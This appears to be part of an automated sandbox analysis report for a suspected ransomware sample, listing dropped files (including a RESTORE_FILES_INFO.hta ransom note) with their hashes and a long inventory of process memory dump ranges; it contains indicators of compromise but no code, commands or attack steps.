7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe

Filesize
367KB

MD5
b31f6216e6bc5a6291a0b82de0377553

SHA1
0afdc5359268f7e78a0ca3c3c67752edd304a742

SHA256
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb

SHA512
7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Filesize
22KB

MD5
81f2e6838b3675761922aa2381151539

SHA1
62960abd80931dc373a5917051dbea46f8bc687a

SHA256
c259fed4c0ad3fedac2fe51bcd019be0ff954e4daf913a278d106c2ade216b6a

SHA512
80cdd76e82f9de07ae86c0f18eb655f0d4e43fbcf4cac79fc001a7a83ab9d2442e02be93c1adbf3b647b6e9288473790af3b17ff2cf4636fede9b4b22e108487

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
478f1c1fcff584f4f440469ed71d2d43

SHA1
0900e9dc39580d527c145715f985a5a86e80b66c

SHA256
c918bf6bad93b653f9d05007634b088be7b91ed4350b777905d0520d93d650eb

SHA512
4ed62f2add77e0dd8e07e101ee06bdb8a15808b701c7580b09704bd4befdecf7cfe2fa29d6e96f2149a92f4e1b0cae0d9810a5cde3f4940145f8120f7322d1a7

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f4912cd27f85cc109ddabd6e6c35d0a5

SHA1
fd75c0930c4d4b9483ba83b11cae4f4d2d59ea2c

SHA256
72255abde6af7af37088f46103add19fa78fd548031e1659029e41b4314652ee

SHA512
1c2b32dc0fe135064a9f9be611f1f036dccd3d80bf1ad66f1f69cd371acecd0ddd42f191b2098da9b0f3571a646825fa0a7ceda44a945bfe83ab4e7803fa1b01

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f4912cd27f85cc109ddabd6e6c35d0a5

SHA1
fd75c0930c4d4b9483ba83b11cae4f4d2d59ea2c

SHA256
72255abde6af7af37088f46103add19fa78fd548031e1659029e41b4314652ee

SHA512
1c2b32dc0fe135064a9f9be611f1f036dccd3d80bf1ad66f1f69cd371acecd0ddd42f191b2098da9b0f3571a646825fa0a7ceda44a945bfe83ab4e7803fa1b01

Download Submit
memory/432-144-0x0000000000000000-mapping.dmp

Download
memory/596-272-0x000001E8E65D3000-0x000001E8E65D5000-memory.dmp

Filesize
8KB

Download
memory/596-271-0x000001E8E65D0000-0x000001E8E65D2000-memory.dmp

Filesize
8KB

Download
memory/600-147-0x0000000000000000-mapping.dmp

Download
memory/752-119-0x0000000000000000-mapping.dmp

Download
memory/760-132-0x0000000000000000-mapping.dmp

Download
memory/788-266-0x0000021962E93000-0x0000021962E95000-memory.dmp

Filesize
8KB

Download
memory/788-265-0x0000021962E90000-0x0000021962E92000-memory.dmp

Filesize
8KB

Download
memory/984-286-0x000001DA44E93000-0x000001DA44E95000-memory.dmp

Filesize
8KB

Download
memory/984-285-0x000001DA44E90000-0x000001DA44E92000-memory.dmp

Filesize
8KB

Download
memory/1316-146-0x0000000000000000-mapping.dmp

Download
memory/1320-143-0x0000000000000000-mapping.dmp

Download
memory/1328-145-0x0000000000000000-mapping.dmp

Download
memory/1344-129-0x0000000000000000-mapping.dmp

Download
memory/1356-122-0x0000000000000000-mapping.dmp

Download
memory/1440-281-0x0000022AEC8B0000-0x0000022AEC8B2000-memory.dmp

Filesize
8KB

Download
memory/1440-282-0x0000022AEC8B3000-0x0000022AEC8B5000-memory.dmp

Filesize
8KB

Download
memory/1452-123-0x0000000000000000-mapping.dmp

Download
memory/1672-169-0x0000000000000000-mapping.dmp

Download
memory/2088-168-0x0000000000000000-mapping.dmp

Download
memory/2228-130-0x0000000000000000-mapping.dmp

Download
memory/2268-275-0x0000018274143000-0x0000018274145000-memory.dmp

Filesize
8KB

Download
memory/2268-274-0x0000018274140000-0x0000018274142000-memory.dmp

Filesize
8KB

Download
memory/2464-172-0x0000000000000000-mapping.dmp

Download
memory/2704-118-0x0000000000000000-mapping.dmp

Download
memory/2820-138-0x0000000000000000-mapping.dmp

Download
memory/2836-137-0x0000000000000000-mapping.dmp

Download
memory/2868-131-0x0000000000000000-mapping.dmp

Download
memory/2996-280-0x0000016075EA3000-0x0000016075EA5000-memory.dmp

Filesize
8KB

Download
memory/2996-260-0x0000016075EA0000-0x0000016075EA2000-memory.dmp

Filesize
8KB

Download
memory/3040-133-0x0000000000000000-mapping.dmp

Download
memory/3288-127-0x0000000000000000-mapping.dmp

Download
memory/3336-136-0x0000000000000000-mapping.dmp

Download
memory/3344-142-0x0000000000000000-mapping.dmp

Download
memory/3480-139-0x0000000000000000-mapping.dmp

Download
memory/3556-128-0x0000000000000000-mapping.dmp

Download
memory/3572-135-0x0000000000000000-mapping.dmp

Download
memory/3648-134-0x0000000000000000-mapping.dmp

Download
memory/3680-121-0x0000000000000000-mapping.dmp

Download
memory/3720-126-0x0000000000000000-mapping.dmp

Download
memory/3756-170-0x0000000000000000-mapping.dmp

Download
memory/3844-124-0x0000000000000000-mapping.dmp

Download
memory/3884-125-0x0000000000000000-mapping.dmp

Download
memory/3888-140-0x0000000000000000-mapping.dmp

Download
memory/3896-171-0x0000000000000000-mapping.dmp

Download
memory/3924-116-0x000000001AFE0000-0x000000001AFE2000-memory.dmp

Filesize
8KB

Download
memory/3924-114-0x00000000003A0000-0x00000000003A1000-memory.dmp

Filesize
4KB

Download
memory/3940-268-0x0000014A36E30000-0x0000014A36E32000-memory.dmp

Filesize
8KB

Download
memory/3940-269-0x0000014A36E33000-0x0000014A36E35000-memory.dmp

Filesize
8KB

Download
memory/3984-117-0x0000000000000000-mapping.dmp

Download
memory/4020-270-0x0000020C7AB40000-0x0000020C7AB42000-memory.dmp

Filesize
8KB

Download
memory/4020-289-0x0000020C7AB45000-0x0000020C7AB46000-memory.dmp

Filesize
4KB

Download
memory/4020-290-0x0000020C7AB47000-0x0000020C7AB49000-memory.dmp

Filesize
8KB

Download
memory/4020-273-0x0000020C7AB43000-0x0000020C7AB45000-memory.dmp

Filesize
8KB

Download
memory/4020-141-0x0000000000000000-mapping.dmp

Download
memory/4052-120-0x0000000000000000-mapping.dmp

Download
memory/4104-148-0x0000000000000000-mapping.dmp

Download
memory/4132-173-0x0000000000000000-mapping.dmp

Download
memory/4156-149-0x0000000000000000-mapping.dmp

Download
memory/4192-174-0x0000000000000000-mapping.dmp

Download
memory/4204-150-0x0000000000000000-mapping.dmp

Download
memory/4252-176-0x0000000000000000-mapping.dmp

Download
memory/4268-151-0x0000000000000000-mapping.dmp

Download
memory/4272-284-0x000001F1BBCF3000-0x000001F1BBCF5000-memory.dmp

Filesize
8KB

Download
memory/4272-283-0x000001F1BBCF0000-0x000001F1BBCF2000-memory.dmp

Filesize
8KB

Download
memory/4308-177-0x0000000000000000-mapping.dmp

Download
memory/4312-212-0x0000000000A40000-0x0000000000A42000-memory.dmp

Filesize
8KB

Download
memory/4312-210-0x0000000000170000-0x0000000000171000-memory.dmp

Filesize
4KB

Download
memory/4320-152-0x0000000000000000-mapping.dmp

Download
memory/4332-190-0x00000289CF020000-0x00000289CF021000-memory.dmp

Filesize
4KB

Download
memory/4332-203-0x00000289CCEC3000-0x00000289CCEC5000-memory.dmp

Filesize
8KB

Download
memory/4332-179-0x0000000000000000-mapping.dmp

Download
memory/4332-202-0x00000289CCEC6000-0x00000289CCEC8000-memory.dmp

Filesize
8KB

Download
memory/4332-201-0x00000289CCEC0000-0x00000289CCEC2000-memory.dmp

Filesize
8KB

Download
memory/4332-185-0x00000289CCE50000-0x00000289CCE51000-memory.dmp

Filesize
4KB

Download
memory/4360-153-0x0000000000000000-mapping.dmp

Download
memory/4372-175-0x0000000000000000-mapping.dmp

Download
memory/4392-154-0x0000000000000000-mapping.dmp

Download
memory/4444-155-0x0000000000000000-mapping.dmp

Download
memory/4516-156-0x0000000000000000-mapping.dmp

Download
memory/4540-178-0x0000000000000000-mapping.dmp

Download
memory/4556-279-0x000001E95F373000-0x000001E95F375000-memory.dmp

Filesize
8KB

Download
memory/4556-276-0x000001E95F370000-0x000001E95F372000-memory.dmp

Filesize
8KB

Download
memory/4556-157-0x0000000000000000-mapping.dmp

Download
memory/4588-158-0x0000000000000000-mapping.dmp

Download
memory/4616-230-0x00000207D9D53000-0x00000207D9D55000-memory.dmp

Filesize
8KB

Download
memory/4616-261-0x00000207D9D57000-0x00000207D9D59000-memory.dmp

Filesize
8KB

Download
memory/4616-229-0x00000207D9D50000-0x00000207D9D52000-memory.dmp

Filesize
8KB

Download
memory/4616-253-0x00000207DB990000-0x00000207DB991000-memory.dmp

Filesize
4KB

Download
memory/4616-259-0x00000207D9D55000-0x00000207D9D56000-memory.dmp

Filesize
4KB

Download
memory/4620-231-0x0000020C7A0A0000-0x0000020C7A0A2000-memory.dmp

Filesize
8KB

Download
memory/4620-232-0x0000020C7A0A3000-0x0000020C7A0A5000-memory.dmp

Filesize
8KB

Download
memory/4620-241-0x0000020C7A3F0000-0x0000020C7A3F1000-memory.dmp

Filesize
4KB

Download
memory/4620-254-0x00007FF69F280000-0x00007FF69F281000-memory.dmp

Filesize
4KB

Download
memory/4620-263-0x0000020C7A0A7000-0x0000020C7A0A9000-memory.dmp

Filesize
8KB

Download
memory/4620-262-0x0000020C7A0A5000-0x0000020C7A0A6000-memory.dmp

Filesize
4KB

Download
memory/4640-159-0x0000000000000000-mapping.dmp

Download
memory/4692-160-0x0000000000000000-mapping.dmp

Download
memory/4720-205-0x0000000000000000-mapping.dmp

Download
memory/4764-161-0x0000000000000000-mapping.dmp

Download
memory/4776-162-0x0000000000000000-mapping.dmp

Download
memory/4780-278-0x000001AC28FF3000-0x000001AC28FF5000-memory.dmp

Filesize
8KB

Download
memory/4780-277-0x000001AC28FF0000-0x000001AC28FF2000-memory.dmp

Filesize
8KB

Download
memory/4872-163-0x0000000000000000-mapping.dmp

Download
memory/4884-164-0x0000000000000000-mapping.dmp

Download
memory/4888-267-0x000001B15B4A3000-0x000001B15B4A5000-memory.dmp

Filesize
8KB

Download
memory/4888-264-0x000001B15B4A0000-0x000001B15B4A2000-memory.dmp

Filesize
8KB

Download
memory/4888-291-0x000001B15B4A5000-0x000001B15B4A6000-memory.dmp

Filesize
4KB

Download
memory/4976-165-0x0000000000000000-mapping.dmp

Download
memory/5028-166-0x0000000000000000-mapping.dmp

Download
memory/5072-167-0x0000000000000000-mapping.dmp

Download